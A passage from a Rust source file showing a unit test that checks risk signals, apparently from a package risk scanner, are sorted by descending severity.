2491 }
2492
2493 #[test]
2494 fn sort_is_severity_descending() {
2495 let mut signals = vec![
2496 RiskSignal {
2497 id: "a".into(),
2498 package: "p".into(),
2499 severity: Severity::Low,
2500 weight: 1,
2501 confidence: 1.0,
2502 evidence: vec![],
2503 recommendation: String::new(),
2504 },
2505 RiskSignal {
2506 id: "b".into(),
2507 package: "p".into(),
2508 severity: Severity::High,
2509 weight: 1,
2510 confidence: 1.0,
2511 evidence: vec![],
2512 recommendation: String::new(),
2513 },
2514 ];
2515 sort_signals(&mut signals);
2516 assert_eq!(signals[0].severity, Severity::High);
2517 }
2518}